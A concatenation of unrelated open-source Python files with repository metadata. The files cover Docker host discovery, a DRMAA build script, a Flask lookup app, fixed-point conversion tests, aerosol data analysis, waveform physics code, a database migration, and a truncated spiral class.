def get_dockers(
roles: Roles, pattern_hosts: str = "*", container_name: str = ".*"
) -> List[DockerHost]:
"""Get remote dockers hosts.
Args:
roles: the roles as returned by
:py:meth:`enoslib.infra.provider.Provider.init`
pattern_hosts: pattern to describe ansible hosts to target.
see https://docs.ansible.com/ansible/latest/intro_patterns.html
container_name: name of the containers to look for. Regexp are
supported as in filter option of docker inpect.
Returns:
List of DockerHost matching the passed container_name
"""
docker_hosts = []
result = run_command(
f"docker ps -q --filter name={container_name} | xargs docker inspect",
pattern_hosts=pattern_hosts,
roles=roles,
on_error_continue=True,
)
# parsing the results
for alias, r in result["ok"].items():
dockers = json.loads(r["stdout"])
host = get_hosts(roles, alias)[0]
for docker in dockers:
docker_host = DockerHost.from_state(docker, host)
docker_hosts.append(docker_host)
return docker_hosts | gpl-3.0 | -5,821,203,870,560,577,000 | 36.073529 | 84 | 0.652252 | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/scripts/scramble/scripts/DRMAA_python-macosx.py | 1 | 1552 | import os, sys, shutil
if "SGE_ROOT" not in os.environ:
print "main(): Please set SGE_ROOT to the path of your SGE installation"
print "main(): before scrambling DRMAA_python"
sys.exit(1)
# change back to the build dir
if os.path.dirname( sys.argv[0] ) != "":
os.chdir( os.path.dirname( sys.argv[0] ) )
# find setuptools
sys.path.append( os.path.join( '..', '..', '..', 'lib' ) )
from scramble_lib import *
tag = get_tag() # get the tag
clean() # clean up any existing stuff (could happen if you run scramble.py by hand)
# patch
file = "setup.py"
print "main(): Patching", file
if not os.access( "%s.orig" %file, os.F_OK ):
shutil.copyfile( file, "%s.orig" %file )
i = open( "%s.orig" %file, "r" )
o = open( file, "w" )
for line in i.readlines():
if line == 'SGE6_ROOT="/scratch_test02/SGE6"\n':
line = 'SGE6_ROOT="%s"\n' % os.environ["SGE_ROOT"]
if line.startswith('link_args ='):
line = 'link_args = [ "-L%s" % os.path.join(SGE6_ROOT, "lib", SGE6_ARCH), "-ldrmaa" ]\n'
print >>o, line,
i.close()
o.close()
# build
me = sys.argv[0]
sys.argv = [ me ]
sys.argv.append( "build" )
execfile( "setup.py", globals(), locals() )
# fix _cDRMAA.so rpath
so = "build/lib.%s-%s/_cDRMAA.so" % ( pkg_resources.get_platform(), sys.version[:3] )
libdrmaa = os.path.join(SGE6_ROOT, "lib", SGE6_ARCH, "libdrmaa.dylib.1.0" )
os.system( "install_name_tool -change libdrmaa.dylib.1.0 %s %s" % ( libdrmaa, so ) )
# package
sys.argv = [ me ]
sys.argv.append( "bdist_egg" )
execfile( "setup.py", globals(), locals() )
| gpl-3.0 | -6,921,328,556,642,751,000 | 30.673469 | 97 | 0.619201 | false |
demarlik01/szcal | app.py | 1 | 1040 | from flask import Flask
from flask import request
from flask import jsonify
from flask import Response
from flask_cors import CORS
from database import session
from models import Address
from urllib import parse
from utils import replace_if_short_address
app = Flask(__name__)
CORS(app)
@app.route('/cj/secluded_place')
def cj_secluded_place():
address_args = request.args.get('address')
if address_args:
trimmed_address = parse.unquote(address_args).replace(' ', '')
address = replace_if_short_address(trimmed_address)
result = session.query(Address).filter(Address.trimmed_address == address).first()
if result is not None:
result_dict = {
'zipcode': result.zipcode,
'address': result.address,
'additional_fee': result.add_fee,
}
return jsonify(result_dict)
else:
return Response(status=404)
else:
return Response(status=400)
if __name__ == '__main__':
app.run(debug=True)
| mit | -1,199,521,550,846,967,300 | 27.888889 | 90 | 0.638462 | false |
vejmelkam/wrfxpy | tests/l0_retr_test.py | 1 | 1892 | #
# Dalton Burke
#
# Test correct functionality of the retrieval of level0 files
import os
import subprocess
import datetime
import shutil
# Set root directory of wrfxpy as working directory
script_path = os.path.realpath(__file__)
# + 6 gets us to wrfxpy
index = script_path.find('wrfxpy/tests') + 6
os.chdir(script_path[:index])
# Path where the download files should go
local_path = 'tests/l0_test_ingest'
# Remove data from old tests
shutil.rmtree(local_path, ignore_errors=True)
current_time = datetime.datetime.utcnow()
ten_hours_ago = str(current_time - datetime.timedelta(hours=10)).replace(' ', '_')
five_hours_ago = str(current_time - datetime.timedelta(hours=5)).replace(' ', '_')
current_time = str(current_time).replace(' ', '_')
source_types = ['MODIS_AQUA', 'MODIS_TERRA', 'VIIRS_NPP']
# -----------------------------------------------------------------------
# Download all data sources from the last 5 hours
print "TESTING SOURCES FOR FILES IN LAST 5 HOURS\n"
for t in source_types:
print "\nRETRIEVING %s FILES FROM THE LAST 5 HOURS WITH CALL:" % t
print './level0_retr.sh %s %s %s %s \n' % (t, five_hours_ago, current_time, local_path)
subprocess.call(['./level0_retr.sh', t, five_hours_ago, current_time, local_path])
print "\nDONE RETRIEVING FILES FROM LAST 5 HOURS \n\n"
# -----------------------------------------------------------------------
# Download all data sources from the last 10 hours
# (some data we should already have, so those should be skipped)
print "TESTING SOURCES FOR FILES IN LAST 10 HOURS\n"
for t in source_types:
print "\nRETRIEVING %s FILES FROM THE LAST 10 HOURS WITH CALL:" % t
print './level0_retr.sh %s %s %s %s \n' % (t, ten_hours_ago, current_time, local_path)
subprocess.call(['./level0_retr.sh', t, ten_hours_ago, current_time, local_path])
print "\nDONE RETRIEVING FILES FROM LAST 10 HOURS"
| mit | -768,657,775,686,732,700 | 30.533333 | 91 | 0.650106 | false |
project-rig/rig | tests/test_type_casts.py | 1 | 8696 | import numpy as np
import pytest
from rig.type_casts import (
float_to_fix, fix_to_float,
float_to_fp, fp_to_float,
NumpyFloatToFixConverter, NumpyFixToFloatConverter
)
import struct
sz = {
8: 'b',
16: 'h',
32: 'i',
}
SZ = {k: v.upper() for k, v in sz.items()}
class TestFloatToFix(object):
"""Test converting from a float to a fixed point.
"""
@pytest.mark.parametrize(
"signed, n_bits, n_frac",
[(True, 32, 32), # Too many frac bits
(False, 32, 33),
(False, -1, 3),
(False, 32, -1), # Negative
])
def test_invalid_parameters(self, signed, n_bits, n_frac):
with pytest.raises(ValueError):
float_to_fix(signed, n_bits, n_frac)
@pytest.mark.parametrize(
"value, n_bits, n_frac, output",
[(0.50, 8, 4, 0x08),
(0.50, 8, 5, 0x10),
(0.50, 8, 6, 0x20),
(0.50, 8, 7, 0x40),
(0.50, 8, 8, 0x80),
(0.25, 8, 4, 0x04),
(0.75, 8, 4, 0x0c),
(1.75, 8, 4, 0x1c),
(-1.75, 8, 4, 0x00), # Clipped
])
def test_no_saturate_unsigned(self, value, n_bits, n_frac, output):
assert float_to_fix(False, n_bits, n_frac)(value) == output
assert float_to_fp(False, n_bits, n_frac)(value) == output
@pytest.mark.parametrize(
"v, n_bits, n_frac, output",
[(0.50, 8, 4, 0x08),
(0.50, 8, 5, 0x10),
(0.50, 8, 6, 0x20),
(0.50, 8, 7, 0x40),
(0.25, 8, 4, 0x04),
(0.75, 8, 4, 0x0c),
(-.50, 8, 4, 0xf8),
(-.50, 8, 5, 0xf0),
(-.50, 8, 6, 0xe0),
(-.50, 8, 7, 0xc0),
(-.25, 8, 4, 0xfc),
(-.75, 8, 4, 0xf4),
(-.25, 8, 1, 0x00),
(1.75, 8, 4, 0x1c),
(-1.75, 8, 4, 0xe4),
(-2.75, 8, 4, 0xd4),
(-1.0, 8, 4, 0xf0),
(-7.9375, 8, 4, 0x81),
(-8, 8, 4, 0x80),
(-16, 8, 4, 0x80),
(-1.0, 8, 3, 0xf8),
(-1.0, 8, 2, 0xfc),
(-1.0, 8, 1, 0xfe),
(-1.0, 16, 1, 0xfffe),
(-1.0, 16, 2, 0xfffc),
])
def test_no_saturate_signed(self, v, n_bits, n_frac, output):
assert float_to_fix(True, n_bits, n_frac)(v) == output
assert (
struct.pack(sz[n_bits], float_to_fp(True, n_bits, n_frac)(v)) ==
struct.pack(SZ[n_bits], output)
)
@pytest.mark.parametrize(
"value, n_bits, n_frac, output",
[(2**4, 8, 4, 0xff), # Saturate
(2**4 - 1 + sum(2**-n for n in range(1, 6)), 8, 4, 0xff), # Saturate
])
def test_saturate_unsigned(self, value, n_bits, n_frac, output):
assert float_to_fix(False, n_bits, n_frac)(value) == output
assert float_to_fp(False, n_bits, n_frac)(value) == output
class TestFloatToFp(object):
@pytest.mark.parametrize(
"signed, n_bits, n_frac, value, output",
((True, 8, -2, 0.25, 0x0),
(True, 8, -2, 4, 0x1),
(True, 8, -2, -4, -0x1),
(False, 8, -2, -4, 0x0),
)
)
def test_negative_nfrac(self, signed, n_bits, n_frac, value, output):
assert float_to_fp(signed, n_bits, n_frac)(value) == output
@pytest.mark.parametrize(
"signed, n_bits, n_frac, value, output",
((True, 8, 8, -0.5, -0x80),
(False, 8, 8, 0.5, 0x80),
(False, 8, 9, 0.5, 0xff),
(False, 8, 9, 0.25, 0x80),
)
)
def test_large_nfrac(self, signed, n_bits, n_frac, value, output):
assert float_to_fp(signed, n_bits, n_frac)(value) == output
class TestFixToFloat(object):
@pytest.mark.parametrize(
"signed, n_bits, n_frac",
[(True, 32, 32), # Too many frac bits
(False, 32, 33),
(False, -1, 3),
(False, 32, -1), # Negative
])
def test_invalid_parameters(self, signed, n_bits, n_frac):
with pytest.raises(ValueError):
fix_to_float(signed, n_bits, n_frac)
@pytest.mark.parametrize(
"bits, signed, n_bits, n_frac, value",
[(0xff, False, 8, 0, 255.0),
(0x81, True, 8, 0, -127.0),
(0xff, False, 8, 1, 127.5),
(0xf8, True, 8, 4, -0.5)
])
def test_fix_to_float(self, bits, signed, n_bits, n_frac, value):
assert value == fix_to_float(signed, n_bits, n_frac)(bits)
@pytest.mark.parametrize(
"bits, n_frac, value",
[(0xff, 0, 255.0),
(-0x7f, 0, -127.0),
(0xff, 1, 127.5),
(-0x08, 4, -0.5)
])
def test_fp_to_float(bits, n_frac, value):
assert value == fp_to_float(n_frac)(bits)
class TestNumpyFloatToFixConverter(object):
def test_init_fails(self):
with pytest.raises(ValueError):
NumpyFloatToFixConverter(False, 31, 0)
@pytest.mark.parametrize(
"signed, n_bits, dtype, n_bytes",
[(False, 8, np.uint8, 1),
(True, 8, np.int8, 1),
(False, 16, np.uint16, 2),
(True, 16, np.int16, 2),
(False, 32, np.uint32, 4),
(True, 32, np.int32, 4),
(False, 64, np.uint64, 8),
(True, 64, np.int64, 8),
])
def test_dtypes(self, signed, n_bits, dtype, n_bytes):
"""Check that the correcy dtype is returned."""
fpf = NumpyFloatToFixConverter(signed, n_bits, 0)
assert fpf.dtype == dtype
assert fpf.bytes_per_element == n_bytes
@pytest.mark.parametrize(
"n_bits, n_frac, values, dtype",
[(8, 4, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 3, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 2, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 1, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 0, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 8, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 9, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(16, 12, [0.5, 0.25, 0.125, 0.0625], np.uint16),
(32, 15, [0.5, 0.25, 0.125, 0.0625], np.uint32),
])
def test_unsigned_no_saturate(self, n_bits, n_frac, values, dtype):
# Create the formatter then call it on the array
fpf = NumpyFloatToFixConverter(False, n_bits, n_frac)
vals = fpf(np.array(values))
# Check the values are correct
ftf = float_to_fp(False, n_bits, n_frac)
assert np.all(vals == np.array([ftf(v) for v in values]))
assert vals.dtype == dtype
@pytest.mark.parametrize(
"n_bits, n_frac, values, dtype",
[(8, 4, [0.5, 0.25, 0.125, 0.0625, -0.5], np.int8),
(8, 3, [0.5, 0.25, 0.125, 0.0625, -0.25], np.int8),
(8, 2, [0.5, 0.25, 0.125, 0.0625, -0.33], np.int8),
(8, 1, [0.5, 0.25, 0.125, 0.0625, -0.25], np.int8),
(8, 0, [0.5, 0.25, 0.125, 0.0625, -0.23], np.int8),
(8, 9, [0.5, 0.25, 0.125, 0.0625, -0.23], np.int8),
(16, 12, [0.5, 0.25, 0.125, 0.0625, -0.45], np.int16),
(32, 15, [0.5, 0.25, 0.125, 0.0625, -0.77], np.int32),
])
def test_signed_no_saturate(self, n_bits, n_frac, values, dtype):
# Create the formatter then call it on the array
fpf = NumpyFloatToFixConverter(True, n_bits, n_frac)
vals = fpf(np.array(values))
# Check the values are correct
ftf = float_to_fp(True, n_bits, n_frac)
assert np.all(vals == np.array([ftf(v) for v in values]))
assert vals.dtype == dtype
@pytest.mark.parametrize("signed", [True, False])
@pytest.mark.parametrize(
"n_bits, n_frac",
[(8, 0), (8, 4), (16, 5), (32, 27)])
def test_saturate(self, signed, n_bits, n_frac):
# Build the values
values = [2.0**(n_bits - n_frac - (1 if signed else 0)),
2.0**(n_bits - n_frac - (1 if signed else 0)) - 1]
# Format
fpf = NumpyFloatToFixConverter(signed, n_bits, n_frac)
vals = fpf(np.array(values))
c = {8: 'B', 16: 'H', 32: 'I'}[n_bits]
# Check the values are correct
ftf = float_to_fix(signed, n_bits, n_frac)
assert ( # pragma: no branch
bytes(vals.data) ==
struct.pack("{}{}".format(len(values), c),
*[ftf(v) for v in values])
)
class TestNumpyFixToFloat(object):
@pytest.mark.parametrize(
"values, dtype, n_frac, expected_values",
[([0xff], np.uint8, 4, np.array([15.9375])),
([0xf8], np.int8, 4, np.array([-.5])),
]
)
def test_standard(self, values, dtype, n_frac, expected_values):
input_array = np.array(values, dtype=dtype)
fpf = NumpyFixToFloatConverter(n_frac)
output_array = fpf(input_array)
assert np.all(output_array == expected_values)
| gpl-2.0 | -4,021,734,756,975,590,000 | 33.371542 | 78 | 0.50598 | false |
annahs/atmos_research | LEO_2D_histos_from_db.py | 1 | 3992 | import sys
import os
import datetime
import pickle
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as colors
from pprint import pprint
import sqlite3
import calendar
from datetime import datetime
#id INTEGER PRIMARY KEY AUTOINCREMENT,
#sp2b_file TEXT,
#file_index INT,
#instr TEXT,
#instr_locn TEXT,
#particle_type TEXT,
#particle_dia FLOAT,
#unix_ts_utc FLOAT,
#actual_scat_amp FLOAT,
#actual_peak_pos INT,
#FF_scat_amp FLOAT,
#FF_peak_pos INT,
#FF_gauss_width FLOAT,
#zeroX_to_peak FLOAT,
#LF_scat_amp FLOAT,
#incand_amp FLOAT,
#lag_time_fit_to_incand FLOAT,
#LF_baseline_pct_diff FLOAT,
#rBC_mass_fg FLOAT,
#coat_thickness_nm FLOAT,
#zero_crossing_posn FLOAT,
#UNIQUE (sp2b_file, file_index, instr)
#connect to database
conn = sqlite3.connect('C:/projects/dbs/SP2_data.db')
c = conn.cursor()
instrument = 'UBCSP2'
instrument_locn = 'WHI'
type_particle = 'incand'
start_date = datetime.strptime('20120401','%Y%m%d')
end_date = datetime.strptime('20120531','%Y%m%d')
lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/WHI long term record/coatings/lookup_tables/coating_lookup_table_WHI_2012_UBCSP2.lupckl'
rBC_density = 1.8
incand_sat = 3750
LF_max = 45000 #above this is unreasonable
lookup = open(lookup_file, 'r')
lookup_table = pickle.load(lookup)
lookup.close()
min_rBC_mass = 1.63#120 2.6-#140 3.86-#160nm 0.25
max_rBC_mass = 2.6#140 3.86-160 5.5-#180nm 10.05
VED_min = 65
VED_max = 220
scat_lim = 100
begin_data = calendar.timegm(start_date.timetuple())
end_data = calendar.timegm(end_date.timetuple())
data = []
particles=0
no_scat=0
no_scat_110 =0
fit_failure=0
early_evap=0
early_evap_110=0
flat_fit=0
LF_high=0
for row in c.execute('''SELECT rBC_mass_fg, coat_thickness_nm, unix_ts_utc, LF_scat_amp, LF_baseline_pct_diff, sp2b_file, file_index, instr,actual_scat_amp
FROM SP2_coating_analysis
WHERE instr=? and instr_locn=? and particle_type=? and rBC_mass_fg>=? and rBC_mass_fg<? and unix_ts_utc>=? and unix_ts_utc<?''',
(instrument,instrument_locn,type_particle, min_rBC_mass, max_rBC_mass, begin_data,end_data)):
particles+=1
rBC_mass = row[0]
coat_thickness = row[1]
event_time = datetime.utcfromtimestamp(row[2])
LEO_amp = row[3]
LF_baseline_pctdiff = row[4]
file = row[5]
index = row[6]
instrt = row[7]
meas_scat_amp = row[8]
rBC_VED = (((rBC_mass/(10**15*rBC_density))*6/3.14159)**(1/3.0))*10**7 #VED in nm with 10^15fg/g and 10^7nm/cm
if meas_scat_amp < 6:
no_scat +=1
if rBC_VED > scat_lim:
no_scat_110+=1
data.append([rBC_VED,coat_thickness])
if LEO_amp == 0.0 and LF_baseline_pctdiff == None and meas_scat_amp >= 6:
early_evap +=1
if rBC_VED > scat_lim:
early_evap_110 +=1
if LEO_amp == -2:
early_evap +=1
if rBC_VED > scat_lim:
early_evap_110 +=1
if LEO_amp == -1:
fit_failure +=1
if LEO_amp == 0.0 and LF_baseline_pctdiff != None:
flat_fit +=1
if LEO_amp > LF_max:
LF_high +=1
if LEO_amp > 0:
data.append([rBC_VED,coat_thickness])
print '# of particles', particles
print 'no_scat', no_scat
print 'no_scat_110', no_scat_110
print 'fit_failure', fit_failure
print 'early_evap', early_evap
print 'early_evap_110', early_evap_110
print 'flat_fit', flat_fit
print 'LF_high', LF_high
evap_pct = (early_evap)*100.0/particles
evap_pct_110 = (early_evap_110)*100.0/particles
no_scat_pct = (no_scat)*100.0/particles
no_scat_pct_110 = no_scat_110*100./particles
print evap_pct, evap_pct_110, no_scat_pct,no_scat_pct_110
rBC_VEDs = [row[0] for row in data]
coatings = [row[1] for row in data]
median_coat = np.median (coatings)
print 'median coating',median_coat
#####hexbin coat vs core###
fig = plt.figure()
ax = fig.add_subplot(111)
#x_limits = [0,250]
#y_limits = [0,250]
#h = plt.hexbin(rBC_VEDs, coatings, cmap=cm.jet,gridsize = 50, mincnt=1)
hist = plt.hist(coatings, bins=50)
plt.xlabel('frequency')
plt.xlabel('Coating Thickness (nm)')
#cb = plt.colorbar()
#cb.set_label('frequency')
plt.show()
| mit | -1,434,911,381,491,213,300 | 22.904192 | 155 | 0.693136 | false |
andrewbird/wader | core/oal.py | 1 | 1507 | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2008 Vodafone España, S.A.
# Copyright (C) 2008-2009 Warp Networks, S.L.
# Author: Pablo Martí
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
OS Abstraction Layer
OS provides an abstraction layer so path differences between OSes/distros
won't affect Wader
"""
_os_obj = None
def get_os_object():
"""
Returns a ``OSPlugin`` instance corresponding to current OS used
If the OS is unknown it will return None
"""
global _os_obj
if _os_obj is not None:
return _os_obj
from core.plugin import PluginManager
from wader.common.interfaces import IOSPlugin
for osplugin in PluginManager.get_plugins(IOSPlugin):
if osplugin.is_valid():
osplugin.initialize()
_os_obj = osplugin
return _os_obj
return None
| gpl-2.0 | -3,816,758,469,775,962,000 | 30.354167 | 73 | 0.706312 | false |
moble/scri | scri/__init__.py | 1 | 7034 | # Copyright (c) 2020, Michael Boyle
# See LICENSE file for details: <https://github.com/moble/scri/blob/master/LICENSE>
"""Module for operating on gravitational waveforms in various forms
Classes
-------
WaveformBase : Base class
This is probably not needed directly; it is just used for inheritance by other objects.
WaveformModes: Complex spin-weighted spherical-harmonic modes
The modes must include all `m` values for a range of `ell` values. This is the "classic" version of a WaveformBase
object we might normally think of.
WaveformGrid: Complex quantity evaluated along world lines of grid points on the sphere
To perform translations or boosts, we need to transform to physical space, along a series of selected world lines
distributed evenly across the sphere. These values may need to be interpolated to new time values, and they will
presumably need to be transformed back to `WaveformModes`.
WaveformInDetector: Real quantities as observed in an inertial detector
Detectors only measure one polarization, so they deal with real quantities. Also, data is measured in evenly
spaced time steps. This object can be created from a `WaveformModes` object.
WaveformInDetectorFT: (Complex) Fourier transform of a `WaveformInDetector`
This contains only the positive-frequency values since the transformed data is real.
"""
import sys
import functools
import numba
from ._version import __version__
jit = functools.partial(numba.njit, cache=True)
jitclass = numba.experimental.jitclass
def version_info():
"""Show version information about this module and various dependencies"""
import spherical_functions
import quaternion
import scipy
import numba
import numpy
versions = "\n".join(
[
f"scri.__version__ = {__version__}",
f"spherical_functions.__version__ = {spherical_functions.__version__}",
f"quaternion.__version__ = {quaternion.__version__}",
f"scipy.__version__ = {scipy.__version__}",
f"numba.__version__ = {numba.__version__}",
f"numpy.__version__ = {numpy.__version__}",
]
)
return versions
# The speed of light is, of course, defined to be exact:
speed_of_light = 299792458.0 # m/s
# The value of the solar mass parameter G*M_sun is known to higher accuracy than either of its factors. The value
# here is taken from the publication "2015 Selected Astronomical Constants", which can be found at
# <http://asa.usno.navy.mil/SecK/Constants.html>. This is (one year more current than, but numerically the same as)
# the source cited by the Particle Data Group. It is given as 1.32712440041e20 m^3/s^2 in the TDB (Barycentric
# Dynamical Time) time scale, which seems to be the more relevant one, and looks like the more standard one for LIGO.
# Dividing by the speed of light squared, we get the mass of the sun in meters; dividing again, we get the mass of
# the sun in seconds:
m_sun_in_meters = 1476.62503851 # m
m_sun_in_seconds = 4.92549094916e-06 # s
# By "IAU 2012 Resolution B2", the astronomical unit is defined to be exactly 1 au = 149597870700 m. The parsec
# is, in turn, defined as "The distance at which 1 au subtends 1 arc sec: 1 au divided by pi/648000." Thus, the
# future-proof value of the parsec in meters is
parsec_in_meters = 3.0856775814913672789139379577965e16 # m
FrameType = [UnknownFrameType, Inertial, Coprecessing, Coorbital, Corotating] = range(5)
FrameNames = ["UnknownFrameType", "Inertial", "Coprecessing", "Coorbital", "Corotating"]
DataType = [UnknownDataType, psi0, psi1, psi2, psi3, psi4, sigma, h, hdot, news, psin] = range(11)
DataNames = ["UnknownDataType", "Psi0", "Psi1", "Psi2", "Psi3", "Psi4", "sigma", "h", "hdot", "news", "psin"]
SpinWeights = [sys.maxsize, 2, 1, 0, -1, -2, 2, -2, -2, -2, sys.maxsize]
ConformalWeights = [sys.maxsize, 2, 1, 0, -1, -2, 1, 0, -1, -1, -3]
RScaling = [sys.maxsize, 5, 4, 3, 2, 1, 2, 1, 1, 1, 0]
MScaling = [sys.maxsize, 2, 2, 2, 2, 2, 0, 0, 1, 1, 2]
DataNamesLaTeX = [
r"\mathrm{unknown data type}",
r"\psi_0",
r"\psi_1",
r"\psi_2",
r"\psi_3",
r"\psi_4",
r"\sigma",
r"h",
r"\dot{h}",
r"\mathrm{n}",
r"\psi_n",
]
# It might also be worth noting that:
# - the radius `r` has spin weight 0 and boost weight -1
# - a time-derivative `d/du` has spin weight 0 and boost weight -1
# - \eth has spin weight +1; \bar{\eth} has spin weight -1
# - \eth in the GHP formalism has boost weight 0
# - \eth in the original NP formalism has undefined boost weight
# - It seems like `M` should have boost weight 1, but I'll have to think about the implications
# Set up the WaveformModes object, by adding some methods
from .waveform_modes import WaveformModes
from .mode_calculations import (
LdtVector,
LVector,
LLComparisonMatrix,
LLMatrix,
LLDominantEigenvector,
angular_velocity,
corotating_frame,
inner_product,
)
from .flux import (
energy_flux,
momentum_flux,
angular_momentum_flux,
poincare_fluxes,
boost_flux
)
WaveformModes.LdtVector = LdtVector
WaveformModes.LVector = LVector
WaveformModes.LLComparisonMatrix = LLComparisonMatrix
WaveformModes.LLMatrix = LLMatrix
WaveformModes.LLDominantEigenvector = LLDominantEigenvector
WaveformModes.angular_velocity = angular_velocity
from .rotations import (
rotate_decomposition_basis,
rotate_physical_system,
to_coprecessing_frame,
to_corotating_frame,
to_inertial_frame,
align_decomposition_frame_to_modes,
)
WaveformModes.rotate_decomposition_basis = rotate_decomposition_basis
WaveformModes.rotate_physical_system = rotate_physical_system
WaveformModes.to_coprecessing_frame = to_coprecessing_frame
WaveformModes.to_corotating_frame = to_corotating_frame
WaveformModes.to_inertial_frame = to_inertial_frame
WaveformModes.align_decomposition_frame_to_modes = align_decomposition_frame_to_modes
WaveformModes.energy_flux = energy_flux
WaveformModes.momentum_flux = momentum_flux
WaveformModes.angular_momentum_flux = angular_momentum_flux
WaveformModes.boost_flux = boost_flux
WaveformModes.poincare_fluxes = poincare_fluxes
from .waveform_grid import WaveformGrid
# from .waveform_in_detector import WaveformInDetector
from .extrapolation import extrapolate
from .modes_time_series import ModesTimeSeries
from .asymptotic_bondi_data import AsymptoticBondiData
from . import sample_waveforms, SpEC, LVC, utilities
__all__ = [
"WaveformModes",
"WaveformGrid",
"WaveformInDetector",
"FrameType",
"UnknownFrameType",
"Inertial",
"Coprecessing",
"Coorbital",
"Corotating",
"FrameNames",
"DataType",
"UnknownDataType",
"psi0",
"psi1",
"psi2",
"psi3",
"psi4",
"sigma",
"h",
"hdot",
"news",
"psin",
"DataNames",
"DataNamesLaTeX",
"SpinWeights",
"ConformalWeights",
"RScaling",
"MScaling",
"speed_of_light",
"m_sun_in_meters",
"m_sun_in_seconds",
"parsec_in_meters",
]
| mit | -5,533,757,833,371,105,000 | 35.071795 | 119 | 0.707279 | false |
quarkslab/irma | frontend/extras/migration/versions/eb7141efd75a_version_1_3_0.py | 1 | 6216 | """version 1.3.0
Revision ID: eb7141efd75a
Revises: 430a70c8aa21
Create Date: 2016-01-06 13:38:46.918409
"""
# revision identifiers, used by Alembic.
revision = 'eb7141efd75a'
down_revision = '430a70c8aa21'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from irma.common.utils.utils import UUID
from sqlalchemy import Column, Integer, ForeignKey, String, BigInteger, Numeric
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.orm import relationship, backref
from api.common.models import tables_prefix
Base = declarative_base()
class File(Base):
__tablename__ = '{0}file'.format(tables_prefix)
# Fields
id = Column(Integer, primary_key=True)
sha256 = Column(String)
sha1 = Column(String)
md5 = Column(String)
timestamp_first_scan = Column(Numeric)
timestamp_last_scan = Column(Numeric)
size = Column(BigInteger)
mimetype = Column(String)
path = Column(String)
class FileWeb(Base):
__tablename__ = '{0}fileWeb'.format(tables_prefix)
# Fields
id = Column(Integer, primary_key=True)
external_id = Column(String)
id_file = Column(Integer)
name = Column(String)
path = Column(String)
id_scan = Column(Integer)
id_parent = Column(Integer)
class FileWebMigration(Base):
__tablename__ = '{0}fileWeb'.format(tables_prefix)
__table_args__ = {'extend_existing': True}
# Fields
id = Column(Integer, primary_key=True)
external_id = Column(String)
id_file = Column(Integer)
name = Column(String)
path = Column(String)
id_scan = Column(Integer)
id_parent = Column(Integer)
scan_file_idx = Column(Integer)
def upgrade():
bind = op.get_bind()
session = scoped_session(sessionmaker(autocommit=False, autoflush=False,
bind=bind))
op.add_column('irma_file', sa.Column('mimetype',
sa.String(),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('external_id',
sa.String(length=36),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('id_parent',
sa.Integer(),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('path',
sa.String(length=255),
nullable=True))
# Create external_id as new uuid
for fileweb in session.query(FileWeb).all():
if fileweb.external_id is None:
fileweb.external_id = UUID.generate()
session.commit()
# Now that all data are fixed set column to non nullable
op.alter_column('irma_fileWeb', 'external_id', nullable=False)
op.create_index(op.f('ix_irma_fileWeb_external_id'),
'irma_fileWeb',
['external_id'],
unique=False)
op.drop_constraint(u'irma_fileWeb_id_scan_scan_file_idx_key',
'irma_fileWeb',
type_='unique')
op.create_unique_constraint(None,
'irma_fileWeb',
['external_id'])
op.create_foreign_key(None,
'irma_fileWeb',
'irma_file',
['id_parent'],
['id'])
op.drop_column('irma_fileWeb', 'scan_file_idx')
op.add_column('irma_scan', sa.Column('force',
sa.Boolean(),
nullable=True))
op.add_column('irma_scan', sa.Column('mimetype_filtering',
sa.Boolean(),
nullable=True))
op.add_column('irma_scan', sa.Column('probelist',
sa.String(),
nullable=True))
op.add_column('irma_scan', sa.Column('resubmit_files',
sa.Boolean(),
nullable=True))
op.add_column('irma_tag', sa.Column('text',
sa.String(),
nullable=False))
op.drop_column('irma_tag', 'name')
def downgrade():
bind = op.get_bind()
session = scoped_session(sessionmaker(autocommit=False, autoflush=False,
bind=bind))
op.add_column('irma_tag', sa.Column('name',
sa.VARCHAR(),
autoincrement=False,
nullable=False))
op.drop_column('irma_tag', 'text')
op.drop_column('irma_scan', 'resubmit_files')
op.drop_column('irma_scan', 'probelist')
op.drop_column('irma_scan', 'mimetype_filtering')
op.drop_column('irma_scan', 'force')
op.add_column('irma_fileWeb', sa.Column('scan_file_idx',
sa.INTEGER(),
autoincrement=False,
nullable=True))
# Create scan_file_idx autoincrement per scan
last_id_scan = None
scan_idx = 0
for fileweb in session.query(FileWebMigration).all():
if last_id_scan != fileweb.id_scan:
last_id_scan = fileweb.id_scan
scan_idx = 0
if fileweb.scan_file_idx is None:
fileweb.scan_file_idx = scan_idx
scan_idx += 1
op.create_unique_constraint(u'irma_fileWeb_id_scan_scan_file_idx_key',
'irma_fileWeb',
['id_scan', 'scan_file_idx'])
op.drop_index(op.f('ix_irma_fileWeb_external_id'),
table_name='irma_fileWeb')
op.drop_column('irma_fileWeb', 'path')
op.drop_column('irma_fileWeb', 'id_parent')
op.drop_column('irma_fileWeb', 'external_id')
op.drop_column('irma_file', 'mimetype')
| apache-2.0 | -4,304,994,386,734,047,000 | 36.221557 | 79 | 0.519466 | false |
barneygale/cedar | cedar/spiral.py | 1 | 1117 | square = 16 * 25
class Spiral:
@classmethod
def spiral(cls, radius, start=(0,0)):
clip1 = (2*radius - 1)//square
clip2 = max(0, radius - square//2)
